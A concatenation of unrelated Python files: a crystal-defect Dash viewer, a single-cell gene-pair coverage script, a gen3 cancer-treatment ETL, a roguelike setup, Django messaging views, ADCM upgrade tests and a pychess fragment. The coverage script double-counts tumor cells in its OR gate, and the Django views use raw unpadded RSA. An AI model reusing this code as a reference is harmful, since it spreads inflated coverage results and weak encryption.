band_edge_eigenvalues=eigval,
supercell_vbm=perfect.vbm,
supercell_cbm=perfect.cbm)
scene_dicts = loadfn(d / "parchgs" / "scene_dicts.json")
if isinstance(scene_dicts, dict):
scene_dicts = SceneDicts.from_dict(scene_dicts)
single_defect_layouts.append(
SingleDefectComponent(pot, eig, scene_dicts, defect_entry.full_name,
id=f"{defect_entry.full_name}").layout())
if cpd_plot_info.cpd.dim in [2, 3]:
cpd_energy_comp = CpdEnergy2D3DComponent(cpd_plot_info, perfect, defects,
defect_entries, corrections)
else:
cpd_energy_comp = CpdEnergyOtherComponent(cpd_plot_info, perfect, defects,
defect_entries, corrections)
structure_component = StructureComponent(structure)
comp = structure.composition.reduced_formula
band_dos_component = BandDosComponent(dos_plot_data, band_plot_data, id=f"band_dos_{comp}",)
supercell_component = SupercellComponent(supercell_info)
symmetrizer = StructureSymmetrizer(structure)
return create_ctk(structure_component,
symmetry_layout(structure),
mpid_and_link(symmetrizer),
site_layout(symmetrizer),
band_dos_component,
supercell_component.layout,
cpd_energy_comp.layout,
single_defect_layouts)
def parse_args(args):
parser = argparse.ArgumentParser(description="")
parser.add_argument("-b", "--band", type=Path, required=True)
parser.add_argument("-d", "--dos", type=Path, required=True)
parser.add_argument("-p", "--perfect", type=Path, required=True)
parser.add_argument("-def", "--defects", type=Path, nargs="+", required=True)
parser.add_argument("-s", "--supercell_info", type=loadfn, required=True)
parser.add_argument("-c", "--chem_pot_diag", type=str, required=True)
parser.add_argument("--port", type=int)
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
structure = Structure.from_file(args.dos / defaults.contcar)
dos_plot_data = loadfn(args.dos / "dos_plot_data.json")
band_plot_data = loadfn(args.band / "band_plot_info.json")
layout = make_layouts(structure, dos_plot_data, band_plot_data,
args.perfect, args.defects, args.supercell_info,
args.chem_pot_diag)
ctc.register_crystal_toolkit(app=app, layout=layout, cache=None)
app.run_server(debug=True, port=args.port)
|
########################################################
#### Packages ####
import datetime
import time
import sys
from itertools import combinations
start = time.time()
########################################################
#### Prepare RF-result and 2 inputs ####
input = sys.argv
input1 = input[1]
input2 = input[2]
print(input1,input2)
surf_goi = [line.strip().split(' ')[0][1:-1] for line in open("../results/result-1__rf_var-imp.txt")][1:101]
#f = open("input-2a__scrna_annotation.txt","r")
f = open(input1,"r")
f.readline()
d_all_tum = dict()
d_all_nor = dict()
for line in f:
comp = line.strip().split('\t')
cell = comp[0].strip()
anno = comp[1].strip()
if 'Tumor' in anno:
d_all_tum[cell] = ''
if 'Normal' in anno:
d_all_nor[cell] = ''
f.close()
#f = open("input-2b__scrna_gc-matrix.txt","r")
f = open(input2,"r")
line_1st = f.readline().strip().split('\t')
c_tum = list()
c_nor = list()
for i in range(len(line_1st)):
if i != 0:
if line_1st[i] in d_all_tum:
c_tum.append(i)
if line_1st[i] in d_all_nor:
c_nor.append(i)
total_tum = float(len(c_tum))
total_nor = float(len(c_nor))
d_all = dict()
for line in f:
comp = line.strip().split('\t')
gene = comp[0].strip()
if gene in surf_goi:
temp_tum = list()
temp_nor = list()
cnt_tum = 0.0
cnt_nor = 0.0
for i in c_tum:
val = float(comp[i])
temp_tum.append(val)
if val != 0.0:
cnt_tum += 1.0
for i in c_nor:
val = float(comp[i])
temp_nor.append(val)
if val != 0.0:
cnt_nor += 1.0
d_all[gene] = [temp_tum,temp_nor]
f.close()
print("Job1 : Done\n")
########################################################
#### Calculation of Coverages for AND- and OR-gates ####
surf_goi.sort()
c2 = list(combinations(surf_goi,2))
print("all combi count : ",len(c2),"\n")
line_ext_1st = 'Gene_combination\tCoverage_tumor\tCoverage_normal'
line_ext_and = list()
line_ext_or = list()
all_count = 0
for pair in c2:
all_count += 1
if all_count % 2000 == 0:
print(all_count)
gene1 = pair[0].strip()
gene2 = pair[1].strip()
p_name = gene1+'_'+gene2
##
if gene1 not in d_all or gene2 not in d_all:
continue
temp_tum1 = d_all.get(gene1)[0]
temp_nor1 = d_all.get(gene1)[1]
temp_tum2 = d_all.get(gene2)[0]
temp_nor2 = d_all.get(gene2)[1]
##
cnt_tum_and = 0.0
cnt_nor_and = 0.0
cnt_tum_or = 0.0
cnt_nor_or = 0.0
for i in range(int(total_tum)):
if temp_tum1[i] != 0.0 and temp_tum2[i] != 0.0:
cnt_tum_and += 1.0
cnt_tum_or += 1.0
if temp_tum1[i] != 0.0 or temp_tum2[i] != 0.0:
cnt_tum_or += 1.0
for i in range(int(total_nor)):
if temp_nor1[i] != 0.0 and temp_nor2[i] != 0.0:
cnt_nor_and += 1.0
if temp_nor1[i] != 0.0 or temp_nor2[i] != 0.0:
cnt_nor_or += 1.0
prop_tum_and = str(cnt_tum_and/total_tum)
prop_tum_or = str(cnt_tum_or/total_tum)
prop_nor_and = str(cnt_nor_and/total_nor)
prop_nor_or = str(cnt_nor_or/total_nor)
##
line_ext_and.append([p_name+'\t'+prop_tum_and+'\t'+prop_nor_and, p_name, float(prop_nor_and), float(prop_tum_and)])
line_ext_or.append([p_name+'\t'+prop_tum_or+'\t'+prop_nor_or, p_name, float(prop_nor_or), float(prop_tum_or)])
print("Job2 : Done\n")
line_final = list()
line_ext_sort = sorted(line_ext_and, key=lambda line_l: line_l[-1], reverse=True)
for line_l in line_ext_sort:
line_final.append(line_l[0])
line_final.insert(0, line_ext_1st)
f_out = open("../results/result-2__coverage_gate-and.txt","w")
f_out.write('\n'.join(line_final))
f_out.close()
line_final = list()
line_ext_sort = sorted(line_ext_or, key=lambda line_l: line_l[-1], reverse=True)
for line_l in line_ext_sort:
line_final.append(line_l[0])
line_final.insert(0, line_ext_1st)
f_out = open("../results/result-2__coverage_gate-or.txt","w")
f_out.write('\n'.join(line_final))
f_out.close()
########################################################
#### Calculation of Coverages for NOT-gates ####
from itertools import permutations
c2 = list(permutations(surf_goi,2))
print("all combi count : ",len(c2),"\n")
line_ext_1st = 'Gene_combination\tCoverage_tumor\tCoverage_normal'
line_ext_not = list()
all_count = 0
for pair in c2:
all_count += 1
if all_count % 2000 == 0:
print(all_count)
gene1 = pair[0].strip()
gene2 = pair[1].strip()
p_name = gene1+'_'+gene2
##
if gene1 not in d_all or gene2 not in d_all:
continue
temp_tum1 = d_all.get(gene1)[0]
temp_nor1 = d_all.get(gene1)[1]
temp_tum2 = d_all.get(gene2)[0]
temp_nor2 = d_all.get(gene2)[1]
##
cnt_tum_not = 0.0
cnt_nor_not = 0.0
for i in range(int(total_tum)):
if temp_tum1[i] != 0.0 and temp_tum2[i] == 0.0:
cnt_tum_not += 1.0
for i in range(int(total_nor)):
if temp_nor1[i] != 0.0 and temp_nor2[i] == 0.0:
cnt_nor_not += 1.0
prop_tum_not = str(cnt_tum_not/total_tum)
prop_nor_not = str(cnt_nor_not/total_nor)
##
line_ext_not.append([p_name+'\t'+prop_tum_not+'\t'+prop_nor_not, p_name, float(prop_nor_not), float(prop_tum_not)])
print("Job3 : Done\n")
line_final = list()
line_ext_sort = sorted(line_ext_not, key=lambda line_l: line_l[-1], reverse=True)
for line_l in line_ext_sort:
line_final.append(line_l[0])
line_final.insert(0, line_ext_1st)
f_out = open("../results/result-2__coverage_gate-not.txt","w")
f_out.write('\n'.join(line_final))
f_out.close()
####
end = time.time()
sec = (end - start)
result = datetime.timedelta(seconds=sec)
result_list = str(datetime.timedelta(seconds=sec)).split(".")
print(result_list[0])
|
<filename>transform/bcc_labkey/treatment.py<gh_stars>1-10
"""A transformer for gen3 project,reads treatments bcc, writes to DEFAULT_OUTPUT_DIR."""
import hashlib
import os
import json
from gen3_etl.utils.ioutils import reader
from defaults import DEFAULT_OUTPUT_DIR, DEFAULT_EXPERIMENT_CODE, DEFAULT_PROJECT_ID, default_parser, emitter, default_treatment, missing_parent, save_missing_parents, obscure_dates
from gen3_etl.utils.schema import generate, template
LOOKUP_PATHS = """
source/bcc/treatment_agent.json
source/bcc/treatment_agent_alt_name.json
source/bcc/treatment_chemotherapy_regimen.json
source/bcc/unit_of_measure.json
source/bcc/treatment_combo.json
source/bcc/treatment_combo_agents.json
source/bcc/treatment_type.json
source/bcc/delivery_method.json
""".strip().split()
def get_uniq(line):
"""Returns a uniq value other than treatment type or submitter id."""
return line.get('lsid', line.get('date', line.get('definitive_resection_date', None)))
def transform_gen3(item_paths, output_dir, project_id, compresslevel=0):
"""Creates gen3.treatment, returns set of treatment_ids."""
diagnoses = set([line['submitter_id'] for line in reader('{}/diagnosis.json'.format(output_dir))])
treatment_emitter = emitter('treatment', output_dir=output_dir)
treatment_ids = set([])
missing_diagnoses = []
for p,treatment_type, callback in item_paths:
source = os.path.splitext(os.path.basename(p))[0]
for line in reader(p):
participantid = line.get('ParticipantID', line.get('participantid', None))
assert participantid, 'ParticipantID not in {} {}'.format(p, line.keys())
diagnosis_submitter_id = '{}-diagnosis'.format(participantid)
treatment_submitter_id = '{}-{}-{}'.format(diagnosis_submitter_id, treatment_type, get_uniq(line))
if diagnosis_submitter_id not in diagnoses:
missing_diagnoses.append(missing_parent(parent_id=diagnosis_submitter_id, parent_type='diagnosis', child_id=treatment_submitter_id, child_type='treatment'))
print('skipping missing diagnosis', treatment_submitter_id)
continue
if treatment_submitter_id in treatment_ids:
print('skipping ',treatment_submitter_id, p, line.keys())
continue
treatment_ids.add(treatment_submitter_id)
treatment = default_treatment(treatment_submitter_id, diagnosis_submitter_id, treatment_type, project_id)
treatment = obscure_dates(treatment, output_dir=output_dir, participantid=participantid)
treatment_emitter.write(treatment)
save_missing_parents(missing_diagnoses)
return treatment_ids
def transform_chemotherapy(item_paths, output_dir, project_id, treatment_ids, compresslevel=0):
"""Read bcc labkey json and writes gen3 json."""
bcc_treatment_emitter = emitter('bcc_chemotherapy', output_dir=output_dir)
for p,type, callback in item_paths:
source = os.path.splitext(os.path.basename(p))[0]
for line in reader(p):
line['source'] = source
if callback:
line = callback(line)
diagnosis_submitter_id = '{}-diagnosis'.format(line['ParticipantID'])
treatment_submitter_id = '{}-Chemotherapy-{}'.format(diagnosis_submitter_id, get_uniq(line))
if treatment_submitter_id not in treatment_ids:
# print('transform_chemotherapy {} not in treatment_ids, skipping.'.format(treatment_submitter_id))
continue
bcc_treatment = {
'type': 'bcc_chemotherapy',
'project_id': project_id,
'treatment': {'submitter_id': treatment_submitter_id},
'submitter_id': '{}-{}-{}'.format(treatment_submitter_id, line['days'], line.get('treatment_description', line.get('treatment_agent', 'na')))
}
bcc_treatment.update(line)
bcc_treatment = obscure_dates(bcc_treatment, output_dir=output_dir)
bcc_treatment_emitter.write(bcc_treatment)
bcc_treatment_emitter.close()
def transform_surgery(item_paths, output_dir, project_id, treatment_ids, compresslevel=0):
"""Read bcc labkey json and writes gen3 json."""
bcc_treatment_emitter = emitter('bcc_surgery', output_dir=output_dir)
bcc_treatment_submitter_ids = []
for p,type, callback in item_paths:
source = os.path.splitext(os.path.basename(p))[0]
for line in reader(p):
line['source'] = source
if callback:
line = callback(line)
participantid = line.get('ParticipantID', line.get('participantid', None))
assert participantid, 'ParticipantID not in {} {}'.format(p, line.keys())
diagnosis_submitter_id = '{}-diagnosis'.format(participantid)
treatment_submitter_id = '{}-Surgery-{}'.format(diagnosis_submitter_id, get_uniq(line))
bcc_treatment_submitter_id = '{}-bcc_surgery'.format(treatment_submitter_id)
if treatment_submitter_id not in treatment_ids:
# print('transform_surgery {} not in treatment_ids, skipping.'.format(treatment_submitter_id))
continue
if bcc_treatment_submitter_id in bcc_treatment_submitter_ids:
# print('transform_surgery {} in bcc_treatment_submitter_ids, skipping.'.format(treatment_submitter_id))
continue
bcc_treatment_submitter_ids.append(bcc_treatment_submitter_id)
bcc_treatment = {
'type': 'bcc_surgery',
'project_id': project_id,
'treatment': {'submitter_id': treatment_submitter_id},
'submitter_id': bcc_treatment_submitter_id
}
if 'type' in line and p == 'source/bcc/vResectionDate.json':
del line['type']
bcc_treatment.update(line)
bcc_treatment = obscure_dates(bcc_treatment, output_dir=output_dir)
bcc_treatment_emitter.write(bcc_treatment)
bcc_treatment_emitter.close()
def transform_radiotherapy(item_paths, output_dir, project_id, treatment_ids, compresslevel=0):
"""Read bcc labkey json and writes gen3 json."""
bcc_treatment_emitter = emitter('bcc_radiotherapy', output_dir=output_dir)
bcc_treatment_submitter_ids = []
for p,type, callback in item_paths:
source = os.path.splitext(os.path.basename(p))[0]
for line in reader(p):
line['source'] = source
if callback:
line = callback(line)
participantid = line.get('ParticipantID', line.get('participantid', None))
assert participantid, 'ParticipantID not in {} {}'.format(p, line.keys())
diagnosis_submitter_id = '{}-diagnosis'.format(participantid)
treatment_submitter_id = '{}-Radiotherapy-{}'.format(diagnosis_submitter_id, get_uniq(line))
bcc_treatment_submitter_id = '{}-bcc_radiotherapy'.format(treatment_submitter_id)
if treatment_submitter_id not in treatment_ids:
print('transform_radiotherapy {} not in treatment_ids, skipping.'.format(treatment_submitter_id))
continue
if bcc_treatment_submitter_id in bcc_treatment_submitter_ids:
print('transform_radiotherapy {} in bcc_treatment_submitter_ids, skipping.'.format(treatment_submitter_id))
continue
bcc_treatment_submitter_ids.append(bcc_treatment_submitter_id)
bcc_treatment = {
'type': 'bcc_radiotherapy',
'project_id': project_id,
'treatment': {'submitter_id': treatment_submitter_id},
'submitter_id': bcc_treatment_submitter_id
}
line['radiotherapy_type'] = line['type']
del line['type']
bcc_treatment.update(line)
bcc_treatment = obscure_dates(bcc_treatment, output_dir=output_dir)
bcc_treatment_emitter.write(bcc_treatment)
bcc_treatment_emitter.close()
def lookups():
look_ups = {}
for p in LOOKUP_PATHS:
c = p.replace('source/bcc/','').replace('.json','')
look_ups[c] = {}
print(p, c)
for line in reader(p):
name = line.get('display_name', line.get('alt_display_name', None))
val = [line[k] for k in line if not k.startswith('_') and k.endswith('_id')][0]
look_ups[c][val] = name
return look_ups
LOOKUPS = lookups()
def my_callback(line):
"""Remove fields that start with _, fix key names with embedded /, fix id lookups """
for k in [k for k in line if k.startswith('_')]:
del line[k]
for k in [k for k in line if '/' in k]:
line[k.split('/')[1]] = line[k]
del line[k]
for k in [k for k in line if k.endswith('_id')]:
lup = k.replace('_id', '')
if line[k]:
try:
line[lup] = LOOKUPS[lup][line[k]]
except Exception as e:
print(lup, k, line[k])
print('******')
print(LOOKUPS[lup])
print('******')
raise e
del line[k]
if 'chromosome' in line:
line['chromosome'] = str(line['chromosome'].replace('chr',''))
if 'gene' in line:
line['gene_symbol'] = line['gene']
del line['gene']
line = obscure_dates(line)
return line
def my_schema_callback(schema):
"""Remove fields that start with _, fix key names with embedded /, fix id lookups """
for k in [k for k in schema['properties'] if k.startswith('_')]:
del schema['properties'][k]
for k in [k for k in schema['properties'] if '/' in k]:
schema['properties'][k.split('/')[1]] = schema['properties'][k]
del schema['properties'][k]
for k in [k for k in schema['properties'] if k.endswith('_id')]:
if k in schema['required'] or k in schema['systemProperties']:
continue
schema['properties'][k.replace('_id', '')] = {'type': ['string', 'null']} # schema['properties'][k]
del schema['properties'][k]
# adds extra properties not found in
schema['category'] = 'bcc extention'
schema['properties']['treatment'] = {'$ref': '_definitions.yaml#/to_one'}
return schema
return schema
if __name__ == "__main__":
item_paths = ['source/bcc/treatment_chemotherapy_ohsu.json','source/bcc/treatment_chemotherapy_manually_entered.json']
args = default_parser(DEFAULT_OUTPUT_DIR, DEFAULT_EXPERIMENT_CODE, DEFAULT_PROJECT_ID).parse_args()
item_paths = [
('source/bcc/treatment_chemotherapy_ohsu.json', 'Chemotherapy', my_callback),
('source/bcc/treatment_chemotherapy_manually_entered.json', 'Chemotherapy', my_callback),
# ('source/bcc/vResectionDate.json', 'Surgery', None),
('source/bcc/voncologsurgery.json', 'Surgery', None),
('source/bcc/Radiotherapy.json', 'Radiotherapy', None)
]
treatment_ids = transform_gen3(item_paths, output_dir=args.output_dir, project_id=args.project_id)
# print('\n'.join(treatment_ids))
item_paths = [
('source/bcc/treatment_chemotherapy_ohsu.json', 'Chemotherapy', my_callback),
('source/bcc/treatment_chemotherapy_manually_entered.json', 'Chemotherapy', my_callback),
]
transform_chemotherapy(item_paths, treatment_ids=treatment_ids, output_dir=args.output_dir, project_id=args.project_id)
item_paths = [
'output/bcc/bcc_chemotherapy.json',
]
link = {'name':'treatment', 'backref':'bcc_chemotherapy', 'label':'describes', 'target_type':'treatment', 'multiplicity': 'many_to_one', 'required': False }
schema_path = generate(item_paths,'bcc_chemotherapy', output_dir='output/bcc', links=[link], callback=my_schema_callback)
assert os.path.isfile(schema_path), 'should have an schema file {}'.format(schema_path)
print(schema_path)
item_paths = [
('source/bcc/vResectionDate.json', 'Surgery', my_callback),
('source/bcc/voncologsurgery.json', 'Surgery', my_callback),
]
transform_surgery(item_paths, treatment_ids=treatment_ids, output_dir=args.output_dir, project_id=args.project_id)
item_paths = [
'output/bcc/bcc_surgery.json',
]
link = {'name':'treatment', 'backref':'bcc_surgery', 'label':'describes', 'target_type':'treatment', 'multiplicity': 'many_to_one', 'required': False }
schema_path = generate(item_paths,'bcc_surgery', output_dir='output/bcc', links=[link], callback=my_schema_callback)
assert os.path.isfile(schema_path), 'should have an schema file {}'.format(schema_path)
print(schema_path)
item_paths = [
('source/bcc/Radiotherapy.json', 'Radiotherapy', my_callback),
]
transform_radiotherapy(item_paths, treatment_ids=treatment_ids, output_dir=args.output_dir, project_id=args.project_id)
item_paths = [
'output/bcc/bcc_radiotherapy.json',
]
link = {'name':'treatment', 'backref':'bcc_radiotherapy', 'label':'describes', 'target_type':'treatment', 'multiplicity': 'many_to_one', 'required': False }
schema_path = generate(item_paths,'bcc_radiotherapy', output_dir='output/bcc', links=[link], callback=my_schema_callback)
assert os.path.isfile(schema_path), 'should have an schema file {}'.format(schema_path)
print(schema_path)
|
<filename>functions/initialize.py
import tcod
from typing import Dict, Tuple
from components.entity import Entity
from components.equipment import Equipment
from components.equippable import Equippable
from components.fighter import Fighter
from components.inventory import Inventory
from components.level import Level
from components.message_log import MessageLog
from constants.equipment_slots import EquipmentSlots
from constants.game_states import GameStates
from functions.render import RenderOrder
from map_objects.game_map import GameMap
def get_constants() -> Dict:
window_title: str = 'Roguelike Tutorial tcod'
screen_width: int = 80
screen_height: int = 50
bar_width: int = 20
panel_height: int = 7
panel_y: int = screen_height - panel_height
message_x: int = bar_width + 2
message_width: int = screen_width - bar_width - 2
message_height: int = panel_height - 1
map_width: int = 80
map_height: int = 43
room_max_size: int = 10
room_min_size: int = 6
max_rooms: int = 30
fov_algorithm: int = 0
fov_light_walls: bool = True
fov_radius: int = 10
max_monsters_per_room: int = 3
max_items_per_room: int = 2
colors: Dict = {
'dark_wall': tcod.Color(169, 169, 169), # CSS DarkGray
'dark_ground': tcod.Color(0, 0, 0), # CSS Black
'light_wall': tcod.Color(130, 110, 50),
'light_ground': tcod.Color(200, 180, 50),
'player': tcod.white,
'magic_item': tcod.violet,
'orc': tcod.desaturated_green,
'troll': tcod.darker_green
}
constants: Dict = {
'window_title': window_title,
'screen_width': screen_width,
'screen_height': screen_height,
'bar_width': bar_width,
'panel_height': panel_height,
'panel_y': panel_y,
'message_x': message_x,
'message_width': message_width,
'message_height': message_height,
'map_width': map_width,
'map_height': map_height,
'room_max_size': room_max_size,
'room_min_size': room_min_size,
'max_rooms': max_rooms,
'fov_algorithm': fov_algorithm,
'fov_light_walls': fov_light_walls,
'fov_radius': fov_radius,
'max_monsters_per_room': max_monsters_per_room,
'max_items_per_room': max_items_per_room,
'colors': colors
}
return constants
def get_game_variables(constants: Dict) -> Tuple:
# initialize player/fighter and inventory
fighter_component = Fighter(hp=100, defense=1, power=2)
inventory_component = Inventory(26)
level_component = Level()
equipment_component = Equipment()
player = Entity(int(constants['screen_width'] / 2),
int(constants['screen_height'] /
2), "@", constants['colors'].get('player'),
'Player', blocks=True, render_order=RenderOrder.ACTOR,
fighter=fighter_component, inventory=inventory_component,
level=level_component, equipment=equipment_component)
entities = [player]
# set up inventory stuff
equippable_component = Equippable(EquipmentSlots.MAIN_HAND, power_bonus=2)
dagger = Entity(0, 0, '-', tcod.sky, 'Dagger',
equippable=equippable_component)
player.inventory.add_item(dagger)
player.equipment.toggle_equip(dagger)
# initialize game map
game_map = GameMap(constants['map_width'], constants['map_height'])
game_map.make_map(constants['max_rooms'], constants['room_min_size'], constants['room_max_size'],
constants['map_width'], constants['map_height'], player,
entities, constants['colors'])
# initialize blank message log
message_log = MessageLog(
constants['message_x'], constants['message_width'], constants['message_height'])
# set initial game state
game_state = GameStates.PLAYERS_TURN
return player, entities, game_map, message_log, game_state
|
import os
from django.shortcuts import render
# from django.contrib.auth.models import User
# from django.contrib.auth import login, authenticate
# from .forms import SignupForm
# from django.db import models
from fintech import settings
from messenger.forms import *
from django.contrib.auth.decorators import login_required
# from django.contrib.auth.decorators import user_passes_test
from messenger.models import Message
from django.http import HttpResponseRedirect
from django.utils import encoding
from Crypto.PublicKey import RSA
from newsletter.models import *
from django.core.mail import send_mail
# Create your views here.
@login_required
def delete (request, message_id):
i_d = int(message_id)
if request.user.get_username() != Message.objects.get(pk=i_d).message_to:
return HttpResponseRedirect('/inbox/')
Message.objects.get(pk=i_d).delete()
return HttpResponseRedirect('/inbox/')
@login_required
def unencrypt (request, message_id):
i_d = int(message_id)
message = Message.objects.get(pk=i_d)
if request.user.get_username() != Message.objects.get(pk=i_d).message_to:
return HttpResponseRedirect('/inbox/')
if message.is_encrypted == 'Y':
print("HOORAY")
PROJECT_PATH = os.path.abspath(os.path.dirname(__name__))
file_path = os.path.join(PROJECT_PATH, 'key')
f = open(file_path, 'rb')
bin_key = f.read()
obj_key = RSA.importKey(bin_key, passphrase=None)
message.message_content = obj_key.decrypt(bytes(message.message_enc_content)).decode()
message.is_encrypted = 'N'
message.save()
return HttpResponseRedirect('/inbox/')
@login_required
def viewMessages (request):
view = Message.objects.filter(message_to=""+request.user.get_username())
for x in view:
print(x)
print(x.isNew)
if x.isNew == 'I':
x.isNew = 'U'
else:
x.isNew = 'R'
x.save()
return render(request, 'viewMessages.html', {'messages': view})
@login_required
def newMessage (request):
if request.method == 'POST':
form = MessageForm(request.POST)
if form.is_valid():
message = Message.objects.create()
message.is_encrypted = request.POST.get('is_encrypted')
message.message_to = request.POST.get('message_to')
message.message_from = request.user.get_username()
message.message_title = request.POST.get('message_title')
message.message_content = request.POST.get('message_content')
message.isNew = 'I'
if message.is_encrypted == 'Y':
#file_path = os.path.join(settings.STATIC_ROOT, 'data/key')
PROJECT_PATH = os.path.abspath(os.path.dirname(__name__))
file_path = os.path.join(PROJECT_PATH, 'key')
f = open(file_path, 'rb')
bin_key = f.read()
obj_key = RSA.importKey(bin_key, passphrase=<PASSWORD>)
message.message_enc_content = obj_key.encrypt(str.encode(message.message_content), 0)[0]
message.message_content = '[encrypted]'
message.save()
return HttpResponseRedirect('/inbox/')
else:
print(form.errors)
else:
form = MessageForm()
return render(request, 'newMessage.html', {'form': form})
@login_required
def groupEmail(request):
groups = []
for g in Group.objects.all():
if request.user.is_superuser:
groups.append(g)
elif request.user in g.user_set.all():
groups.append(g)
if request.method == 'POST':
form = EmailForm(request.POST)
if form.is_valid():
group_id = request.POST.get('group')
group = Group.objects.get(id=group_id)
message_subject = request.POST.get('message_subject')
message_content = request.POST.get('message_content')
for user in group.user_set.all():
send_mail(
'Lokahi: '+message_subject,
'User "' + request.user.username +'" from Lokahi sent group "' + group.name +
'" this message: \n\n' + message_content,
'<EMAIL>',
[user.email],
fail_silently=False,
)
return HttpResponseRedirect('/inbox/emailSuccess/')
else:
print(form.errors)
else:
form = EmailForm()
return render(request, 'groupEmail.html', {'form': form, 'groups': groups})
@login_required
def emailSuccess(request):
return render(request, 'emailSuccess.html')
|
<filename>tests/functional/test_adcm_upgrade.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint:disable=redefined-outer-name
from typing import Tuple, Union
import allure
import pytest
from adcm_client.base import ObjectNotFound
from adcm_client.objects import ADCMClient, Cluster, Host, Service
from adcm_pytest_plugin.docker_utils import ADCM
from adcm_pytest_plugin.plugin import parametrized_by_adcm_version
from adcm_pytest_plugin.utils import catch_failed, get_data_dir, random_string
from version_utils import rpm
@pytest.fixture(scope="session")
def upgrade_target(cmd_opts) -> Tuple[str, str]:
if not cmd_opts.adcm_image:
pytest.fail("CLI parameter adcm_image should be provided")
return tuple(cmd_opts.adcm_image.split(":", maxsplit=2)) # type: ignore
def old_adcm_images():
return parametrized_by_adcm_version(adcm_min_version="2019.10.08")[0]
@allure.step("Check that version has been changed")
def _check_that_version_changed(before: str, after: str) -> None:
if rpm.compare_versions(after, before) < 1:
raise AssertionError("ADCM version after upgrade is older or equal to the version before")
def _upgrade_adcm(adcm: ADCM, sdk: ADCMClient, credentials: dict, target: Tuple[str, str]) -> None:
buf = sdk.adcm_version
adcm.upgrade(target)
sdk.reset(url=adcm.url, **credentials)
_check_that_version_changed(buf, sdk.adcm_version)
def _create_cluster(sdk_client_fs: ADCMClient, bundle_dir: str = "cluster_bundle") -> Cluster:
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, bundle_dir))
cluster_name = f"test_{random_string()}"
return bundle.cluster_prototype().cluster_create(name=cluster_name)
def _create_host(sdk_client_fs: ADCMClient, bundle_dir: str = "hostprovider") -> Host:
bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, bundle_dir))
provider = bundle.provider_create(name=f"test_{random_string()}")
return provider.host_create(fqdn=f"test_host_{random_string()}")
@allure.step("Check that previously created cluster exists")
def _check_that_cluster_exists(sdk_client_fs: ADCMClient, cluster: Cluster) -> None:
assert len(sdk_client_fs.cluster_list()) == 1, "Only one cluster expected to be"
with catch_failed(ObjectNotFound, "Previously created cluster not found"):
sdk_client_fs.cluster(name=cluster.name)
@allure.step("Check that previously created service exists")
def _check_that_host_exists(cluster: Cluster, host: Host) -> None:
assert len(cluster.host_list()) == 1, "Only one host expected to be"
with catch_failed(ObjectNotFound, "Previously created host not found"):
cluster.host(fqdn=host.fqdn)
@allure.step("Check encryption")
def _check_encryption(obj: Union[Cluster, Service]) -> None:
assert obj.action(name="check-password").run().wait() == "success"
@pytest.mark.parametrize("adcm_is_upgradable", [True], indirect=True)
@pytest.mark.parametrize("image", old_adcm_images(), ids=repr)
def test_upgrade_adcm(
adcm_fs: ADCM,
sdk_client_fs: ADCMClient,
adcm_api_credentials: dict,
upgrade_target: Tuple[str, str],
) -> None:
"""Test adcm upgrade"""
cluster = _create_cluster(sdk_client_fs)
host = _create_host(sdk_client_fs)
cluster.host_add(host)
_upgrade_adcm(adcm_fs, sdk_client_fs, adcm_api_credentials, upgrade_target)
_check_that_cluster_exists(sdk_client_fs, cluster)
_check_that_host_exists(cluster, host)
@pytest.mark.parametrize("adcm_is_upgradable", [True], indirect=True)
@pytest.mark.parametrize("image", old_adcm_images(), ids=repr)
def test_pass_in_config_encryption_after_upgrade(
adcm_fs: ADCM,
sdk_client_fs: ADCMClient,
adcm_api_credentials: dict,
upgrade_target: Tuple[str, str],
) -> None:
"""Test adcm upgrade with encrypted fields"""
cluster = _create_cluster(sdk_client_fs, "cluster_with_pass_verify")
service = cluster.service_add(name="PassCheckerService")
config_diff = dict(password="<PASSWORD>")
cluster.config_set_diff(config_diff)
service.config_set_diff(config_diff)
_upgrade_adcm(adcm_fs, sdk_client_fs, adcm_api_credentials, upgrade_target)
_check_encryption(cluster)
_check_encryption(service)
|
<filename>pychess/widgets/gamenanny.py
""" This module intends to work as glue between the gamemodel and the gamewidget
taking care of stuff that is neither very offscreen nor very onscreen
like bringing up dialogs and """
import math
from collections import defaultdict
from gi.repository import Gtk
from pychess.compat import create_task
from pychess.ic.FICSObjects import (
make_sensitive_if_available,
make_sensitive_if_playing,
)
from pychess.ic.ICGameModel import ICGameModel
from pychess.Utils.Offer import Offer
from pychess.Utils.const import (
WAITING_TO_START,
WHITE,
BLACK,
WHITEWON,
BLACKWON,
WON_ADJUDICATION,
TAKEBACK_OFFER,
LOCAL,
UNDOABLE_STATES,
WHITE_ENGINE_DIED,
UNDOABLE_REASONS,
BLACK_ENGINE_DIED,
HINT,
SPY,
RUNNING,
ABORT_OFFER,
ADJOURN_OFFER,
DRAW_OFFER,
PAUSE_OFFER,
RESUME_OFFER,
HURRY_ACTION,
FLAG_CALL,
)
from pychess.Utils.repr import reprResult_long, reprReason_long
from pychess.Utils.LearnModel import LearnModel
from pychess.System import conf
from pychess.System.Log import log
from pychess.widgets import preferencesDialog
from pychess.widgets.InfoBar import InfoBarMessage, InfoBarMessageButton
from pychess.widgets import InfoBar, mainwindow
from pychess.widgets.gamewidget import getWidgets
from pychess.perspectives import perspective_manager
class GameNanny:
def __init__(self):
self.offer_cids = defaultdict(dict)
self.gmwidg_cids = defaultdict(list)
self.model_cids = defaultdict(list)
def nurseGame(self, gmwidg, gamemodel):
""" Call this function when gmwidget is just created """
log.debug("nurseGame: %s %s" % (gmwidg, gamemodel))
self.gmwidg_cids[gmwidg] = [
gmwidg.connect("closed", self.on_gmwidg_closed),
gmwidg.connect("title_changed", self.on_gmwidg_title_changed),
]
if gamemodel.status == WAITING_TO_START:
self.model_cids[gamemodel].append(
gamemodel.connect("game_started", self.on_game_started, gmwidg)
)
else:
self.on_game_started(gamemodel, gmwidg)
self.model_cids[gamemodel].append(
gamemodel.connect("game_ended", self.game_ended, gmwidg)
)
self.model_cids[gamemodel].append(
gamemodel.connect("game_terminated", self.on_game_terminated, gmwidg)
)
if isinstance(gamemodel, ICGameModel):
